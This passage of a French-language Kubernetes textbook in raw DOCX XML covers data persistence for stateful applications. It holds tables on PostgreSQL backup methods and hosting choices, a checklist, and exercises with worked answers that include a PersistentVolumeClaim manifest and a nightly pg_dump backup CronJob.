            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Avantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pg_dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simple, portable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lent sur gros volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Instantané de volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Dépend du fournisseur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Archivage continu (WAL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Restauration à un instant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Complexe à exploiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Réplique logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Migration à chaud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Ne remplace pas la sauvegarde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RESTAURATION À UN INSTANT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Capacité à restaurer l'état de la base à une seconde précise, en rejouant les journaux d'écriture jusqu'à l'instant voulu. C'est le seul moyen de corriger une suppression accidentelle sans perdre les transactions ultérieures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux réflexes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Vérifier l'âge de la dernière sauvegarde</w:t>
        <w:br/>
        <w:t>aws s3 ls s3://sauvegardes/app/ | tail -5</w:t>
        <w:br/>
        <w:br/>
        <w:t># Une sauvegarde non testée n'existe pas</w:t>
        <w:br/>
        <w:t># Automatiser une restauration hebdomadaire dans un environnement jetable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>68.5 Cas des applications à état</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Faire tourner une base dans Kubernetes est possible, et parfois souhaitable. Une décision éclairée pèse trois éléments : l'équipe, le volume et le besoin de portabilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.252 — Cinq situations et leur recommandation</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3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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Petite équipe, base critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service managé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exploitation déléguée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Contrainte réglementaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Auto-hébergé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Contrôle des données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Développement et tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dans le cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simplicité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Forte croissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Service managé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Sauvegardes, réplicas, montée en charge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Multi-cloud strict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Opérateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Portabilité</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CHECK-LIST D'UNE APPLICATION À ÉTAT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PVC dimensionné et classe de stockage documentée.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Politique de rétention vérifiée.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Sauvegarde externalisée et restaurée régulièrement.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 seul écrivain par volume.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Sondes adaptées à la base, pas au conteneur générique.</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système de fichiers d'un pod disparaît avec lui.</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emptyDir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vit aussi longtemps que le pod.</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PVC demande un volume, un PV le fournit.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mode d'accès conditionne les possibilités de montage.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reclaimPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décide de la conservation des données.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StatefulSet donne une identité et un volume par pod.</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StatefulSet ne fournit pas la réplication applicative.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réplication n'est pas une sauvegarde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les applications à état sont maîtrisées. Le chapitre suivant outille le déploiement de tout cela : Helm et service mesh.</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68.1 — Monter un volume persistant</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Une application doit conserver ses fichiers entre deux redémarrages.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Créez le PVC.</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Montez-le dans le déploiement.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la persistance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 68.2 — Sauvegarder et restaurer</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La base doit être sauvegardée chaque nuit et restaurable.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Automatisez la sauvegarde.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Testez la restauration.</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Documentez la procédure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 68.3 — Choisir un modèle de stockage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois applications : cache, téléversements, base critique.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Associez un type de volume.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Justifiez la durée de vie.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Indiquez la sauvegarde.</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68.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: PersistentVolumeClaim</w:t>
        <w:br/>
        <w:t>metadata: { name: uploads, namespace: production }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  accessModes: ["ReadWriteOnce"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resources: { requests: { storage: 10Gi } }</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t># dans le Deployment</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: uploads</w:t>
        <w:br/>
        <w:t xml:space="preserve">    persistentVolumeClaim: { claimName: uploads }</w:t>
        <w:br/>
        <w:t>volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: uploads</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mountPath: /app/uploads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Écrire dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/app/uploads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, redémarrer le pod, vérifier que le fichier est toujours là.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sans PVC, les fichiers disparaissent au redémarrage : c'est le premier test à faire pour valider une configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 68.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Job Kubernetes de sauvegarde</w:t>
        <w:br/>
        <w:t>apiVersion: batch/v1</w:t>
        <w:br/>
        <w:t>kind: CronJob</w:t>
        <w:br/>
        <w:t>metadata: { name: db-backup, namespace: production }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  schedule: "0 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> *"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  jobTemplate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          restartPolicy: OnFailure</w:t>
        <w:br/>
        <w:t xml:space="preserve">          containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - name: dump</w:t>
        <w:br/>
        <w:t xml:space="preserve">              image: postgres:16</w:t>
        <w:br/>
        <w:t xml:space="preserve">              command: ["/bin/sh", "-c"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">              args:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                - pg_dump -h db -U app -Fc app | gzip &gt; /backup/app-$(date +%F).dump.gz</w:t>
        <w:br/>
        <w:t xml:space="preserve">              volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                - { name: backup, mountPath: /backup }</w:t>
        <w:br/>
        <w:t xml:space="preserve">          volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - name: backup</w:t>
        <w:br/>
        <w:t xml:space="preserve">              persistentVolumeClaim: { claimName: backups }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La sauvegarde doit écrire sur un volume distinct de celui de la base.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La restauration mensuelle dans un environnement jetable est la seule preuve que la sauvegarde est exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 68.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cache : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>emptyDir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, perdu au redémarrage, aucune sauvegarde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Téléversements : PVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ReadWriteMany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou stockage objet, sauvegarde quotidienne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
